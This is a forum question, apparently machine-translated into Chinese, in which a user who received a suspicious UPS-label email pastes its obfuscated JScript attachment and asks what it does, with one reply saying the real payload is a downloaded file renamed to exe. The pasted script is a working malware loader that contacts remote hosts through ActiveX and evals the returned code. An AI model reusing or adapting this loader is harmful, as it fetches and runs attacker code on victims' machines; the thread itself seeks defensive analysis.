我得到了電子郵件今天有人給我發了一個UPS標籤我沒有打開它,因爲我發現它可疑我想知道這是什麼代碼做,電子郵件與UPS標籤腳本它做了什麼?
感謝
var sder = "P";
var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;
var m = "LZUaj4-qfCYW4M3kjDIgGL844Arvxk8a-hL2LmwUe1fG4_p62GL1yQkO5QZj62RgjWMzKm3mojn5OZRDSmV0C9O7RF_9Lw";
var x = new Array("site link", "site link", "site link", "site link", "site link");
var t4 = "ht"+"tp";
var mul = "qwadro";
var ter = "/";
for (var i=0; i<x.length; i++)
{ \t
\t var vDJmB = function(){
\t \t return new ActiveXObject(g2);
\t }();
\t var e = vDJmB;
\t try
\t {
\t \t e.open("G"+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m, false);
\t \t e.send();
\t \t var r = e.responseText;
\t \t if (r.length > 999+1 && r.indexOf(m) > -1)
\t \t {
\t \t \t eval(e.responseText.split(m).join(mul.substring(2,3)));
\t \t \t break;
\t \t };
\t }
\t catch(e)
\t {
\t };
};
我想知道這段代碼做什麼,有人試圖從我那裏獲取信息?謝謝
主要問題它從執行它的用戶得到什麼,我也沒有窗戶。 –
@JunaidAbbasi真正的有效載荷位於下載的png文件中,該文件被重命名爲exe。在安全的環境下,即firejail進行分析之前,你的猜測與我的一樣好......如果我在分析中用葡萄酒之類的東西進一步分析,我會把它鏈接到這裏。這些分析通常發佈在我的商業網站上。 – Catwhisperer